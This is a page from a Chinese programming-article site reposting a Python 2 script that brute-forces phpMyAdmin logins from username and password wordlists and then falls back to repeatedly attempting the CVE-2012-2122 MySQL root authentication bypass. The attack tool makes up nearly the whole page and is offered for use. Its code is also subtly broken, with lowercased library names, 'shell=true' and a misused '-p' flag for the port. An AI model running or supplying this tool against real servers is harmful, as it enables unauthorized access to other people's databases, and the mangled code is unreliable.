欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

Python写的PHPMyAdmin暴力破解工具代码

程序员文章站 2022-06-03 09:25:26
phpmyadmin暴力破解,加上cve-2012-2122 mysql authentication bypass vulnerability漏洞利用。 #!/...

phpmyadmin暴力破解,加上cve-2012-2122 mysql authentication bypass vulnerability漏洞利用。

#!/usr/bin/env python
import urllib 
import urllib2 
import cookielib 
import sys
import subprocess
def crack(url,username,password):
	opener = urllib2.build_opener(urllib2.httpcookieprocessor(cookielib.lwpcookiejar())) 
	headers = {'user-agent' : 'mozilla/5.0 (windows nt 6.1; wow64)'}
	params = urllib.urlencode({'pma_username': username, 'pma_password': password})
	request = urllib2.request(url+"/index.php", params,headers)
	response = opener.open(request) 
	a=response.read() 
	if a.find('database server')!=-1 and a.find('name="login_form"')==-1:
		return username,password
	return 0
def mysqlauthenticationbypasscheck(host,port):
	i=0
	while i<300:
		i=i+1
		subprocess.popen("mysql --host=%s -p %s -uroot -piswin" % (host,port),shell=true).wait()
if __name__ == '__main__':
	if len(sys.argv)<4:
		print "#author:iswin\n#useage python pma.py //www.jb51.net/phpmyadmin/ username.txt password.txt"
		sys.exit()
	print "bruting,pleas wait..."
	for name in open(sys.argv[2],"r"):
		for passw in open(sys.argv[3],"r"):
			state=crack(sys.argv[1],name,passw)
			if state!=0:
				print "\nbrute successful"
				print "username: "+state[0]+"password: "+state[1]
				sys.exit()
	print "sorry,brute failed...,try to use mysqlauthenticationbypasscheck"
	choice=raw_input('warning:this function needs mysql environment.\ny:try to mysqlauthenticationbypasscheck\nothers:exit\n')
	if choice=='y' or choice=='y':
		host=raw_input('host:')
		port=raw_input('port:')
		mysqlauthenticationbypasscheck(host,port)